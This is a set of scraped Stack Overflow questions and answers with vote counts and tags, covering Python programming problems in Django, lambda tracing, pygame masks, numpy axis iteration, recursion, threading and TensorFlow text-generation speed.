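from .models import Booking, Customer   # assumed import path

class BookingCreate(CreateView):
    model = Booking
    fields = ['car', 'start_date', 'end_date']

    def form_valid(self, form):
        # request.user is a CustomUser/User row; Booking.user needs the matching Customer row.
        form.instance.user = get_object_or_404(Customer, pk=self.request.user.pk)
        return super().form_valid(form)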
Django ValueError: Cannot assign ">": "Booking.user" must be a "Customer" instance
The objective is simple: I'm building a car rental platform where customers can place an order for a car. The simple 'order' contains the car, start, and end-dates. The form should automatically save the authenticated user as the creator. It uses a CreateView with this code: class BookingCreate(CreateView): model = Booking fields = ['car', 'start_date', 'end_date'] permission_classes = [permissions.IsAuthenticated] def form_valid(self, form): form.instance.user = self.request.user return super().form_valid(form) The form works fine, but when submitted, it raises this error: ValueError at /rentals/booking/create Cannot assign "<SimpleLazyObject: <CustomUser: Test2 Two>>": "Booking.user" must be a "Customer" instance. I've looked up previous answers, and the best solution came from this thread, which recommended using this code instead def form_valid(self, form): form.instance.user = Booking.objects.get(user=self.request.user) return super().form_valid(form) However, this change returns a slightly different error: ValueError at /rentals/booking/create Cannot query "Test2 Two": Must be "Customer" instance. I have a customUser Model and a "customer" model that inherits from it. For additional context, I am using a customUser model. Because I have multiple user types (in particular (car) Owners and Customers), I use a special table with boolean fields to mark each type as True based on the registration form they use per this this tutorial. Here's the relevant code (there's a lot, so I've only added the relevant parts): models.py from accounts.models import CustomUser class User(CustomUser): is_customer = models.BooleanField(default=False) is_owner = models.BooleanField(default=False) class Owner(models.Model): user = models.OneToOneField(User, on_delete=models.CASCADE, primary_key=True) def __str__(self): return self.user.first_name class Customer(models.Model): user = models.OneToOneField(User, on_delete=models.CASCADE, primary_key=True) cars = models.ManyToManyField('Car', blank=True) ... def get_absolute_url(self): return reverse('rental:customer-detail', args=[str(self.id)]) def __str__(self): return f'{ self.user.first_name } { self.user.last_name }' class Booking(models.Model): """Stores the bookings, for example when it was made, the booking date, and the car ID.""" # Unique ID for this booking. id = models.UUIDField(primary_key=True, default=uuid.uuid4, help_text="Automatically generated unique ID. Do not change.") user = models.ForeignKey('Customer', on_delete=models.SET_NULL, null=True) car = models.ForeignKey(Car, on_delete=models.SET_NULL, null=True) start_date = models.DateField(default=timezone.now) end_date = models.DateField(null=True) ... Solution and extra resources for future explorers Both answers below helped, but the issue kept coming back. The permanent solution was this line of code: def form_valid(self, form): form.instance.created_by = Customer.objects.get(pk=self.request.user.pk) return super().form_valid(form) As alluded to in the question above, this is a common problem. So here are three other threads to look at, each with great answers: ValueError at /post/new/ Cannot assign "<SimpleLazyObject:<User: chetan>>": "Post.author" must be a "User" instance Cannot assign "<SimpleLazyObject: <User: XXX>>": "Comment.user" must be a "MyProfile" instance Cannot assign "<SimpleLazyObject: <User: JohnDoe12>>": "Profile.user" must be a "User" instance
[ "Your self.request.user (or the user you're logged in as) seems to be the CustomUser instance, but you're trying to assign the User instance to the Booking. Though it has the same fields (as it inherits from CustomUser class), it is a different object.\nI think you want to make the CustomUser an abstract model?\nYou should add abstract to the CustomUser class.\nSee: https://docs.djangoproject.com/en/4.1/topics/db/models/#abstract-base-classes\n class Meta:\n abstract = True\n\nThen you would also need to select the correct user model in you'r settings like:\nAUTH_USER_MODEL = 'users.User' for example\nhttps://docs.djangoproject.com/en/4.1/topics/auth/customizing/#substituting-a-custom-user-model\nAlso in the second option you're assigning the Booking instead of the related user. Do this instead:\ndef form_valid(self, form): \n form.instance.user = Booking.objects.get(user=self.request.user).user \n return super().form_valid(form)\n\n", "I'd recommend you to use get_object_or_404() and you need to assign user not Booking instance so:\ndef form_valid(self, form): \n form.instance.user=get_object_or_404(Booking,user=self.request.user).user \n return super().form_valid(form)\n\n" ]
[ 1, 1 ]
[]
[]
[ "django", "django_forms", "django_models", "django_queryset", "python" ]
stackoverflow_0074574723_django_django_forms_django_models_django_queryset_python.txt
Q: How to read and break down complex lambda equations in python This question below is from a past year NUS exam paper, and im not sure how to go about solving this; how do you break down the lambda parts and figure out which bracket is for which lambda variable? I'm unable to trace the code to get 120 def combinator(y): return (lambda x: lambda y: x(y))(lambda x:y) combinator(lambda x:x*10)(11)(12) Ive tried to google but the lambda tutorials are mostly basic so im not sure how to read and break down more complex lambda codes and higher order functions A: The function is def combinator(y): return (lambda x: lambda y: x(y))(lambda x:y) combinator(lambda x:x*10)(11)(12) Let's try to simplify the function. First, take note that you can change the symbol for a function. For example, lambda x: x can be changed to lambda z: z. As there are a lot of x and y, we will change the symbols to reduce the confusion. def combinator(y): return (lambda w: lambda z: w(z))(lambda x:y) combinator(lambda x:x*10)(11)(12) Let's try to define the function as mathematics function to make it easier to understand. Let's set f represents lambda x:x*10, so f(x) = x*10 g represents lambda x:y, so g(x) = y h represents lambda z:w(z), so h(z) = w(z) => h = w k represents lambda w: lambda z: w(z), so k(w) = h = w With the mathematics function defined, you can substitute them back to the function. combinator(y) = (lambda w: lambda z: w(z))(lambda x:y) = k(g) = g Therefore, we know that combinator(y) = g combinator(y)(x) = g(x) = y combinator(y)(x)(z) = y(z) Therefore combinator(lambda x:x*10)(11)(12) = combinator(f)(11)(12) = f(12) = 12*10 = 120
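The same expression with every anonymous function given a name, so each call in the answer's substitution can be checked step by step (the names are just labels added here for clarity):

def combinator(y):
    outer = lambda x: (lambda inner: x(inner))   # takes a function, wraps it
    constant = lambda x: y                       # ignores its argument, returns the captured y
    return outer(constant)                       # a function: inner -> constant(inner) == y

f = lambda x: x * 10     # this becomes the y captured inside combinator
step1 = combinator(f)    # a function that returns f no matter what it is given
step2 = step1(11)        # constant(11) -> f, the 11 is discarded
print(step2(12))         # f(12) -> 120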
How to read and break down complex lambda equations in python
This question below is from a past year NUS exam paper, and im not sure how to go about solving this; how do you break down the lambda parts and figure out which bracket is for which lambda variable? I'm unable to trace the code to get 120 def combinator(y): return (lambda x: lambda y: x(y))(lambda x:y) combinator(lambda x:x*10)(11)(12) Ive tried to google but the lambda tutorials are mostly basic so im not sure how to read and break down more complex lambda codes and higher order functions
[ "The function is\ndef combinator(y):\n return (lambda x: lambda y: x(y))(lambda x:y)\ncombinator(lambda x:x*10)(11)(12)\n\nLet's try to simplify the function. First, take note that you can change the symbol for a function. For example, lambda x: x can be changed to lambda z: z.\nAs there are a lot of x and y, we will change the symbols to reduce the confusion.\ndef combinator(y):\n return (lambda w: lambda z: w(z))(lambda x:y)\ncombinator(lambda x:x*10)(11)(12)\n\nLet's try to define the function as mathematics function to make it easier to understand. Let's set\nf represents lambda x:x*10, so f(x) = x*10\ng represents lambda x:y, so g(x) = y\nh represents lambda z:w(z), so h(z) = w(z) => h = w\nk represents lambda w: lambda z: w(z), so k(w) = h = w\nWith the mathematics function defined, you can substitute them back to the function.\ncombinator(y)\n= (lambda w: lambda z: w(z))(lambda x:y) \n= k(g)\n= g\n\nTherefore, we know that combinator(y) = g\ncombinator(y)(x) = g(x) = y\ncombinator(y)(x)(z) = y(z)\n\nTherefore\ncombinator(lambda x:x*10)(11)(12)\n= combinator(f)(11)(12)\n= f(12)\n= 12*10\n= 120\n\n" ]
[ 0 ]
[]
[]
[ "function", "higher_order_functions", "lambda", "python" ]
stackoverflow_0074573856_function_higher_order_functions_lambda_python.txt
Q: Can some one tell me how i can mask only front part of a car image in pygame? I am making a car racing game, i want to mask front part of the car image (not the whole car image) for collision detection. code front = pygame.mask.from_surface(self.car.car_image) offset = (int(self.car.x-x), int(self.car.y-y)) p = track.overlap(front, offset) A: You can create a subsurface of the image and then a mask from the subsurface: front_surf = self.car.car_image.subsurface((0, 0, width, front_height)) front = pygame.mask.from_surface(front_surf)
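A standalone sketch of the subsurface-plus-mask idea from the answer, with stand-in surfaces so it runs on its own. In the actual game the car surface would be self.car.car_image and track would be the real track mask; front_height is a made-up value for how many pixels count as the nose of the car.

import pygame

# Stand-in car image and track mask, only so the snippet is self-contained.
car_image = pygame.Surface((20, 40), pygame.SRCALPHA)
car_image.fill((255, 0, 0, 255))
track_surface = pygame.Surface((200, 200), pygame.SRCALPHA)
pygame.draw.rect(track_surface, (255, 255, 255, 255), (0, 0, 200, 10))  # a border strip
track = pygame.mask.from_surface(track_surface)

front_height = 8                                   # pixels of the sprite treated as the "front"
front_surf = car_image.subsurface((0, 0, car_image.get_width(), front_height))
front = pygame.mask.from_surface(front_surf)

car_x, car_y = 90, 5                               # car position in track coordinates
offset = (car_x, car_y)
print(track.overlap(front, offset))                # a point if the nose touches, otherwise None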
Can someone tell me how I can mask only the front part of a car image in pygame?
I am making a car racing game. I want to mask only the front part of the car image (not the whole car image) for collision detection. code front = pygame.mask.from_surface(self.car.car_image) offset = (int(self.car.x-x), int(self.car.y-y)) p = track.overlap(front, offset)
[ "You can create a subsurface of the image and then a mask from the subsurface:\nfront_surf = self.car.car_image.subsurface((0, 0, width, front_height))\nfront = pygame.mask.from_surface(front_surf)\n\n" ]
[ 0 ]
[]
[]
[ "pygame", "python" ]
stackoverflow_0074574963_pygame_python.txt
Q: Iterate over inner axes of an array I want to iterate over some inner dimensions of an array without knowing in advance how many dimensions to iterate over. Furthermore I only know that the last two dimensions should not be iterated over. For example assume the array has dimension 5 and shape (i,j,k,l,m) and I want to iterate over the second and third dimension. In each step of the iteration I expect an array of shape (i,l,m). Example 1: Iterate over second dimension of x with x.ndim=4, x.shape=(I,J,K,L). Expected: x[:,j,:,:] for j=0,...,J-1 Example 2: Iterate over second and third dimension of x with x.ndim=5, x.shape=(I,J,K,L,M) Expected: x[:,j,k,:,:] for j=0,...,J-1, k=0,...,K-1 Example 3: Iterate over second, third and fourth dimension of x with x.ndim=6, x.shape=(I,J,K,L,M,N) Expected: x[:,j,k,l,:,:] for j=0,...,J-1, k=0,...,K-1 and l=0,...,L-1 Assume the array has dimension 5 and shape (i,j,k,l,m). If I know which dimension to iterate over, for example the second and third axis, this is possible with a nested for-loop: for j in range(x.shape[1]): for k in range(x.shape[2]): x[...,j,k,:,:] However since I do not know in advance how many dimensions I want to iterate over for-loops are not an option. I found a way to generate the indices based on the shapes of the dimensions I want to iterate over. for b in product(*map(range, x.shape[2:4])): print(b) >>> (0, 0) >>> (0, 1) >>> ... >>> (0, k) >>> ... >>> (j, k) This yields the indices for arbitrary inner dimension which is what I want. However I'm not aware of a way to use this tuple directly to slice into an an array. Therefore I first need to assign these entries to variables and then use these variables for slicing. for b in product(*map(range,x.shape[2:4])): j,k=b x[...,j,k,:,:] But this approach again only works if I know in advance how many dimensions to iterate over. A: With the caveat that I don't fully understand how you want to use this, I reckon the following should do what you are asking for: from itertools import product def iterover(x, axes): x = np.moveaxis(x, axes, np.arange(len(axes))) subshape = x.shape[:len(axes)] ixi = product(*[range(k) for k in subshape]) for ix in ixi: yield ix, x[ix] Example: def genrange(shape): return np.arange(np.product(shape)).reshape(shape) x = genrange((2,3,4,5)) >>> x.shape (2, 3, 4, 5) >>> {ix: xx.shape for ix, xx in iterover(x, (1,2))} {(0, 0): (2, 5), (0, 1): (2, 5), (0, 2): (2, 5), (0, 3): (2, 5), (1, 0): (2, 5), (1, 1): (2, 5), (1, 2): (2, 5), (1, 3): (2, 5), (2, 0): (2, 5), (2, 1): (2, 5), (2, 2): (2, 5), (2, 3): (2, 5)} Notes: The axes to iterate over may be in any order, e.g.: >>> {ix: xx.shape for ix, xx in iterover(x, (2,0))} {(0, 0): (3, 5), (0, 1): (3, 5), (1, 0): (3, 5), (1, 1): (3, 5), (2, 0): (3, 5), (2, 1): (3, 5), (3, 0): (3, 5), (3, 1): (3, 5)} The sub arrays can be used as L-values (modified in place), with the original array modified accordingly. This is due to np.moveaxis() returning a view of the original array (numpy never ceases to amaze me): for ix, xx in iterover(x, (2,0)): if ix == (0,0): xx *= -1 >>> x array([[[[ 0, -1, -2, -3, -4], [ 5, 6, 7, 8, 9], [ 10, 11, 12, 13, 14], [ 15, 16, 17, 18, 19]], [[-20, -21, -22, -23, -24], [ 25, 26, 27, 28, 29], [ 30, 31, 32, 33, 34], [ 35, 36, 37, 38, 39]], ...
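One way to close the gap described in the last paragraph (using the tuple from itertools.product directly as an index, without unpacking it into named variables) is to build the full index tuple out of Ellipsis, the product tuple and trailing slices. Sketch below, assuming the iterated axes are contiguous as in the three examples:

import numpy as np
from itertools import product

x = np.arange(2 * 3 * 4 * 5 * 6).reshape(2, 3, 4, 5, 6)
inner = (1, 2)                                 # axes to iterate over (second and third)
n_trailing = x.ndim - (max(inner) + 1)         # axes left untouched after the inner ones

for b in product(*(range(x.shape[ax]) for ax in inner)):
    idx = (Ellipsis,) + b + (slice(None),) * n_trailing
    sub = x[idx]                               # equivalent to x[..., j, k, :, :]
    # ... work with sub, shape (2, 5, 6) here, i.e. (i, l, m) ...

print(sub.shape)                               # (2, 5, 6)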
Iterate over inner axes of an array
I want to iterate over some inner dimensions of an array without knowing in advance how many dimensions to iterate over. Furthermore I only know that the last two dimensions should not be iterated over. For example assume the array has dimension 5 and shape (i,j,k,l,m) and I want to iterate over the second and third dimension. In each step of the iteration I expect an array of shape (i,l,m). Example 1: Iterate over second dimension of x with x.ndim=4, x.shape=(I,J,K,L). Expected: x[:,j,:,:] for j=0,...,J-1 Example 2: Iterate over second and third dimension of x with x.ndim=5, x.shape=(I,J,K,L,M) Expected: x[:,j,k,:,:] for j=0,...,J-1, k=0,...,K-1 Example 3: Iterate over second, third and fourth dimension of x with x.ndim=6, x.shape=(I,J,K,L,M,N) Expected: x[:,j,k,l,:,:] for j=0,...,J-1, k=0,...,K-1 and l=0,...,L-1 Assume the array has dimension 5 and shape (i,j,k,l,m). If I know which dimension to iterate over, for example the second and third axis, this is possible with a nested for-loop: for j in range(x.shape[1]): for k in range(x.shape[2]): x[...,j,k,:,:] However since I do not know in advance how many dimensions I want to iterate over for-loops are not an option. I found a way to generate the indices based on the shapes of the dimensions I want to iterate over. for b in product(*map(range, x.shape[2:4])): print(b) >>> (0, 0) >>> (0, 1) >>> ... >>> (0, k) >>> ... >>> (j, k) This yields the indices for arbitrary inner dimension which is what I want. However I'm not aware of a way to use this tuple directly to slice into an an array. Therefore I first need to assign these entries to variables and then use these variables for slicing. for b in product(*map(range,x.shape[2:4])): j,k=b x[...,j,k,:,:] But this approach again only works if I know in advance how many dimensions to iterate over.
[ "With the caveat that I don't fully understand how you want to use this, I reckon the following should do what you are asking for:\nfrom itertools import product\n\ndef iterover(x, axes):\n x = np.moveaxis(x, axes, np.arange(len(axes)))\n subshape = x.shape[:len(axes)]\n ixi = product(*[range(k) for k in subshape])\n for ix in ixi:\n yield ix, x[ix]\n\nExample:\ndef genrange(shape):\n return np.arange(np.product(shape)).reshape(shape)\n\nx = genrange((2,3,4,5))\n>>> x.shape\n(2, 3, 4, 5)\n\n>>> {ix: xx.shape for ix, xx in iterover(x, (1,2))}\n{(0, 0): (2, 5),\n (0, 1): (2, 5),\n (0, 2): (2, 5),\n (0, 3): (2, 5),\n (1, 0): (2, 5),\n (1, 1): (2, 5),\n (1, 2): (2, 5),\n (1, 3): (2, 5),\n (2, 0): (2, 5),\n (2, 1): (2, 5),\n (2, 2): (2, 5),\n (2, 3): (2, 5)}\n\nNotes:\n\nThe axes to iterate over may be in any order, e.g.:\n>>> {ix: xx.shape for ix, xx in iterover(x, (2,0))}\n{(0, 0): (3, 5),\n (0, 1): (3, 5),\n (1, 0): (3, 5),\n (1, 1): (3, 5),\n (2, 0): (3, 5),\n (2, 1): (3, 5),\n (3, 0): (3, 5),\n (3, 1): (3, 5)}\n\n\nThe sub arrays can be used as L-values (modified in place), with the original array modified accordingly. This is due to np.moveaxis() returning a view of the original array (numpy never ceases to amaze me):\nfor ix, xx in iterover(x, (2,0)):\n if ix == (0,0):\n xx *= -1\n\n>>> x\narray([[[[ 0, -1, -2, -3, -4],\n [ 5, 6, 7, 8, 9],\n [ 10, 11, 12, 13, 14],\n [ 15, 16, 17, 18, 19]],\n\n [[-20, -21, -22, -23, -24],\n [ 25, 26, 27, 28, 29],\n [ 30, 31, 32, 33, 34],\n [ 35, 36, 37, 38, 39]],\n...\n\n\n\n" ]
[ 0 ]
[]
[]
[ "numpy", "numpy_ndarray", "numpy_slicing", "python" ]
stackoverflow_0074574094_numpy_numpy_ndarray_numpy_slicing_python.txt
Q: Addition and multiplication recursion I've been trying to write a recursive function that adds the following number to an odd number, and multiplies by the following number if the number is even. Essentially: add_mult_rec(5) does 1+2*3+4*5 and should return 27 But by writing: def add_mult_rec(num): if num == 1: return num elif num % 2 == 1: return num * add_mult_rec(num - 1) elif num % 2 == 0: return num + add_mult_rec(num - 1) my output for add_mult_rec(5) is: 65 A: The order of operation should be respected, what you wants is actually: 1 + (2 x 3) + (4 x 5) +... def add_mult_rec(num): if num <= 1: return num if num % 2 == 1: return num * (num - 1) + add_mult_rec(num - 2) else: return num + add_mult_rec(num - 1)
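A quick sanity check of the corrected function from the answer against the expression written out by hand:

def add_mult_rec(num):
    if num <= 1:
        return num
    if num % 2 == 1:
        return num * (num - 1) + add_mult_rec(num - 2)
    return num + add_mult_rec(num - 1)

print(add_mult_rec(5))                             # 27
print(add_mult_rec(5) == 1 + 2 * 3 + 4 * 5)        # True
print(add_mult_rec(6) == 1 + 2 * 3 + 4 * 5 + 6)    # True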
Addition and multiplication recursion
I've been trying to write a recursive function that adds the following number to an odd number, and multiplies by the following number if the number is even. Essentially: add_mult_rec(5) does 1+2*3+4*5 and should return 27 But by writing: def add_mult_rec(num): if num == 1: return num elif num % 2 == 1: return num * add_mult_rec(num - 1) elif num % 2 == 0: return num + add_mult_rec(num - 1) my output for add_mult_rec(5) is: 65
[ "The order of operation should be respected, what you wants is actually: 1 + (2 x 3) + (4 x 5) +...\ndef add_mult_rec(num):\n if num <= 1:\n return num\n \n if num % 2 == 1:\n return num * (num - 1) + add_mult_rec(num - 2)\n else:\n return num + add_mult_rec(num - 1)\n\n" ]
[ 3 ]
[]
[]
[ "python", "recursion" ]
stackoverflow_0074574806_python_recursion.txt
Q: Thread wont start within __init__ method of my class Within the __init__ of my class I want to trigger a thread that handles a function. For some reason the thread isnt triggered though, nothing just happens: class OrderBook: # Create two sorted lists for bids and asks def __init__(self, bids=None, asks=None): if asks is None: asks = [] if bids is None: bids = [] self.bids = sortedcontainers.SortedList(bids, key=lambda order: -order.price) self.asks = sortedcontainers.SortedList(asks, key=lambda order: order.price) # Populate Orderbook with 50 orders threading.Thread(target=populate_orderbook(self, 10)).start() print(f'Orderbook initialized..') ... And the function to be triggered which isnt though def populate_orderbook(orderbook_instance, n): order_type = ['Limit'] side = ['Buy', 'Sell'] i = 1 while i < n: # Create random order order_obj = Order( order_type=order_type[0], side=random.choice(side), price=random.randint(1, 1000), power=random.randint(1, 1000), ) orderbook_instance.add(order_obj) print(f'Orderbook prepopulated..') A: You are calling the target function eagerly, on the main thread. You have to pass the function as an argument to the Thread constructor, and the arguments in separate, so that the function will be called inside the running thread: threading.Thread(target=populate_orderbook, args=(self, 10)).start()
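A stripped-down, runnable sketch of the fix (Order and sortedcontainers are replaced by a plain list so it stands alone): the callable goes in target and its arguments go in args, so the thread itself makes the call.

import threading
import time

def populate_orderbook(orderbook_instance, n):
    for i in range(n):
        orderbook_instance.orders.append(i)   # stand-in for creating Order objects
        time.sleep(0.01)
    print("Orderbook prepopulated..")

class OrderBook:
    def __init__(self):
        self.orders = []
        # Note: the function is NOT called here; the Thread calls it with args later.
        threading.Thread(target=populate_orderbook, args=(self, 10), daemon=True).start()
        print("Orderbook initialized..")

book = OrderBook()
time.sleep(0.5)            # give the background thread time to finish in this demo
print(book.orders)         # [0, 1, ..., 9]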
Thread won't start within the __init__ method of my class
Within the __init__ of my class I want to trigger a thread that handles a function. For some reason the thread isnt triggered though, nothing just happens: class OrderBook: # Create two sorted lists for bids and asks def __init__(self, bids=None, asks=None): if asks is None: asks = [] if bids is None: bids = [] self.bids = sortedcontainers.SortedList(bids, key=lambda order: -order.price) self.asks = sortedcontainers.SortedList(asks, key=lambda order: order.price) # Populate Orderbook with 50 orders threading.Thread(target=populate_orderbook(self, 10)).start() print(f'Orderbook initialized..') ... And the function to be triggered which isnt though def populate_orderbook(orderbook_instance, n): order_type = ['Limit'] side = ['Buy', 'Sell'] i = 1 while i < n: # Create random order order_obj = Order( order_type=order_type[0], side=random.choice(side), price=random.randint(1, 1000), power=random.randint(1, 1000), ) orderbook_instance.add(order_obj) print(f'Orderbook prepopulated..')
[ "You are calling the target function eagerly, on the main thread.\nYou have to pass the function as an argument to the Thread constructor, and the arguments in separate, so that the function will be called inside the running thread:\n threading.Thread(target=populate_orderbook, args=(self, 10)).start()\n\n" ]
[ 1 ]
[]
[]
[ "multithreading", "python" ]
stackoverflow_0074574979_multithreading_python.txt
Q: Speeding up TF/Keras LSTM text generation on GPU? The tensorflow official example for text generation (https://github.com/tensorflow/docs/blob/master/site/en/tutorials/text/text_generation.ipynb) runs in a loop as defined below. The text generation feels slow, and according to NVTOP only uses a fraction of the available GPU resources (15-20%). Any suggestions on how to speed up text generation? A quick look at cprofiler shows that 90% of the time is spent on the single line predictions = model(input_eval), so I don't think there are a lot of gains to be had elsewhere. Also, the Tensorflow/Keras documentation https://www.tensorflow.org/api_docs/python/tf/keras/Model#predict recommends calling the function just as is done below... this method is designed for performance in large scale inputs. For small amount of inputs that fit in one batch, directly using call is recommended for faster execution, e.g., model(x), or model(x, training=False) Any suggestions on how to speed up text generation? Would it be possible to better use the GPU by generating multiple lines at the same time? def generate_text(model, start_string): # Evaluation step (generating text using the learned model) # Number of characters to generate num_generate = 1000 # Converting our start string to numbers (vectorizing) input_eval = [char2idx[s] for s in start_string] input_eval = tf.expand_dims(input_eval, 0) # Empty string to store our results text_generated = [] # Low temperatures results in more predictable text. # Higher temperatures results in more surprising text. # Experiment to find the best setting. temperature = 1.0 # Here batch size == 1 model.reset_states() for i in range(num_generate): predictions = model(input_eval) # remove the batch dimension predictions = tf.squeeze(predictions, 0) # using a categorical distribution to predict the character returned by the model predictions = predictions / temperature predicted_id = tf.random.categorical(predictions, num_samples=1)[-1,0].numpy() # We pass the predicted character as the next input to the model # along with the previous hidden state input_eval = tf.expand_dims([predicted_id], 0) text_generated.append(idx2char[predicted_id]) return (start_string + ''.join(text_generated)) A: To speed up the processing, I have two suggestions, As you have GPU support, you may want to set unroll=True of the GRU layer. As per the Keras GRU documentation, setting unroll=True reduces some computation by using some extra memory. As your GPU consumption is quite less, you may want to use unroll=True. Using this setting, you may notice up to 2x speed boost (depending on the circumstances). However, you should avoid using unroll if the input sequence is too long. I noticed that the text-generation architecture you linked uses GRU layer before a Dense layer. The GRU is given a parameter return_sequences=True. This causes the GRU layer to pass unnecessary output values to the following Dense layers and requires more computation. Generally, return_sequences=True should be only set if the following layer of the model is also an RNN layer. Therefore, try setting the parameter return_sequences=False. This may also improve performance. Finally, the model(x, training=False) really works. I believe by maintaining these three issues, you may notice a significant performance improvement. A: Not sure you can speed generation. You are doing num_generate forward calls on your model for an input with batch size of 1. 
While during training, you can operate on the whole sequence and compute a loss over it, during predicting each new character depends on the previously generated ones and the generation function doesn't run in parallel. If you want to see higher GPU utilization, you could call predict on a batch of inputs seeded with different starting characters - this relates to your question about 'generating multiple lines at the same time'. You could also try using the same starting character and tinker with the hidden state to input into the model, e.g. seeing what a randomly sampled state for the batch produces or extracting hidden state vectors for that starting character from training examples and populating the batched hidden state with those so your models goes in different directions from this initial character. A: Better performance could be also achieved by using a different toolkit for the inference e.g. OpenVINO. It optimizes your model by converting to Intermediate Representation (IR), performing graph pruning and fusing some operations into others while preserving accuracy. Then it uses vectorization in runtime. It's rather straightforward to convert the Keras model to OpenVINO. The full tutorial on how to do it can be found here. Some snippets are below. Install OpenVINO The easiest way to do it is using PIP. Alternatively, you can use this tool to find the best way in your case. pip install openvino-dev[tensorflow2] Save your model as SavedModel OpenVINO is not able to convert the HDF5 model, so you have to save it as SavedModel first. import tensorflow as tf from custom_layer import CustomLayer model = tf.keras.models.load_model('model.h5', custom_objects={'CustomLayer': CustomLayer}) tf.saved_model.save(model, 'model') Use Model Optimizer to convert SavedModel model The Model Optimizer is a command-line tool that comes from OpenVINO Development Package. It converts the Tensorflow model to IR, a default format for OpenVINO. You can also try the precision of FP16, which should give you better performance without a significant accuracy drop (change data_type). Run in the command line: mo --saved_model_dir "model" --data_type FP32 --output_dir "model_ir" Run the inference The converted model can be loaded by the runtime and compiled for a specific device, e.g., CPU or GPU (integrated into your CPU like Intel HD Graphics). If you don't know what the best choice for you is, use AUTO. You care about latency, so I suggest adding a performance hint (as shown below) to use the device that fulfills your requirement. # Load the network ie = Core() model_ir = ie.read_model(model="model_ir/model.xml") compiled_model_ir = ie.compile_model(model=model_ir, device_name="AUTO", config={"PERFORMANCE_HINT":"LATENCY"}) # Get output layer output_layer_ir = compiled_model_ir.output(0) # Run inference on the input image result = compiled_model_ir([input_image])[output_layer_ir] Disclaimer: I work on OpenVINO. OpenVINO is optimized for Intel hardware.
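A rough sketch of the "batch of seed characters" idea from the second answer, assuming the tutorial's char2idx/idx2char lookups and a model rebuilt with batch_size equal to the number of seeds (the tutorial already rebuilds the model with batch_size=1 before generating, so the same step works for any batch size). Seeds are single characters here to keep it short.

import tensorflow as tf

def generate_batch(model, seeds, num_generate=1000, temperature=1.0):
    input_eval = tf.constant([[char2idx[s]] for s in seeds])       # shape (batch, 1)
    generated = [[] for _ in seeds]
    model.reset_states()
    for _ in range(num_generate):
        predictions = model(input_eval)                 # (batch, seq_len, vocab)
        logits = predictions[:, -1, :] / temperature    # last step of every sequence
        next_ids = tf.random.categorical(logits, num_samples=1)    # (batch, 1)
        input_eval = next_ids                           # feed the sampled ids back in
        for row, idx in enumerate(next_ids[:, 0].numpy()):
            generated[row].append(idx2char[idx])
    return [seed + ''.join(chars) for seed, chars in zip(seeds, generated)]

# e.g. generate_batch(model, ["T", "A", "R", "O"]) produces four texts per run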
Speeding up TF/Keras LSTM text generation on GPU?
The tensorflow official example for text generation (https://github.com/tensorflow/docs/blob/master/site/en/tutorials/text/text_generation.ipynb) runs in a loop as defined below. The text generation feels slow, and according to NVTOP only uses a fraction of the available GPU resources (15-20%). Any suggestions on how to speed up text generation? A quick look at cprofiler shows that 90% of the time is spent on the single line predictions = model(input_eval), so I don't think there are a lot of gains to be had elsewhere. Also, the Tensorflow/Keras documentation https://www.tensorflow.org/api_docs/python/tf/keras/Model#predict recommends calling the function just as is done below... this method is designed for performance in large scale inputs. For small amount of inputs that fit in one batch, directly using call is recommended for faster execution, e.g., model(x), or model(x, training=False) Any suggestions on how to speed up text generation? Would it be possible to better use the GPU by generating multiple lines at the same time? def generate_text(model, start_string): # Evaluation step (generating text using the learned model) # Number of characters to generate num_generate = 1000 # Converting our start string to numbers (vectorizing) input_eval = [char2idx[s] for s in start_string] input_eval = tf.expand_dims(input_eval, 0) # Empty string to store our results text_generated = [] # Low temperatures results in more predictable text. # Higher temperatures results in more surprising text. # Experiment to find the best setting. temperature = 1.0 # Here batch size == 1 model.reset_states() for i in range(num_generate): predictions = model(input_eval) # remove the batch dimension predictions = tf.squeeze(predictions, 0) # using a categorical distribution to predict the character returned by the model predictions = predictions / temperature predicted_id = tf.random.categorical(predictions, num_samples=1)[-1,0].numpy() # We pass the predicted character as the next input to the model # along with the previous hidden state input_eval = tf.expand_dims([predicted_id], 0) text_generated.append(idx2char[predicted_id]) return (start_string + ''.join(text_generated))
[ "To speed up the processing, I have two suggestions,\n\nAs you have GPU support, you may want to set unroll=True of the GRU layer. As per the Keras GRU documentation, setting unroll=True reduces some computation by using some extra memory. As your GPU consumption is quite less, you may want to use unroll=True. Using this setting, you may notice up to 2x speed boost (depending on the circumstances). However, you should avoid using unroll if the input sequence is too long.\n\nI noticed that the text-generation architecture you linked uses GRU layer before a Dense layer. The GRU is given a parameter return_sequences=True. This causes the GRU layer to pass unnecessary output values to the following Dense layers and requires more computation. Generally, return_sequences=True should be only set if the following layer of the model is also an RNN layer. Therefore, try setting the parameter return_sequences=False. This may also improve performance.\n\n\nFinally, the model(x, training=False) really works. I believe by maintaining these three issues, you may notice a significant performance improvement.\n", "Not sure you can speed generation. You are doing num_generate forward calls on your model for an input with batch size of 1. While during training, you can operate on the whole sequence and compute a loss over it, during predicting each new character depends on the previously generated ones and the generation function doesn't run in parallel.\nIf you want to see higher GPU utilization, you could call predict on a batch of inputs seeded with different starting characters - this relates to your question about 'generating multiple lines at the same time'.\nYou could also try using the same starting character and tinker with the hidden state to input into the model, e.g. seeing what a randomly sampled state for the batch produces or extracting hidden state vectors for that starting character from training examples and populating the batched hidden state with those so your models goes in different directions from this initial character.\n", "Better performance could be also achieved by using a different toolkit for the inference e.g. OpenVINO. It optimizes your model by converting to Intermediate Representation (IR), performing graph pruning and fusing some operations into others while preserving accuracy. Then it uses vectorization in runtime.\nIt's rather straightforward to convert the Keras model to OpenVINO. The full tutorial on how to do it can be found here. Some snippets are below.\nInstall OpenVINO\nThe easiest way to do it is using PIP. Alternatively, you can use this tool to find the best way in your case.\npip install openvino-dev[tensorflow2]\n\nSave your model as SavedModel\nOpenVINO is not able to convert the HDF5 model, so you have to save it as SavedModel first.\nimport tensorflow as tf\nfrom custom_layer import CustomLayer\nmodel = tf.keras.models.load_model('model.h5', custom_objects={'CustomLayer': CustomLayer})\ntf.saved_model.save(model, 'model')\n\nUse Model Optimizer to convert SavedModel model\nThe Model Optimizer is a command-line tool that comes from OpenVINO Development Package. It converts the Tensorflow model to IR, a default format for OpenVINO. You can also try the precision of FP16, which should give you better performance without a significant accuracy drop (change data_type). 
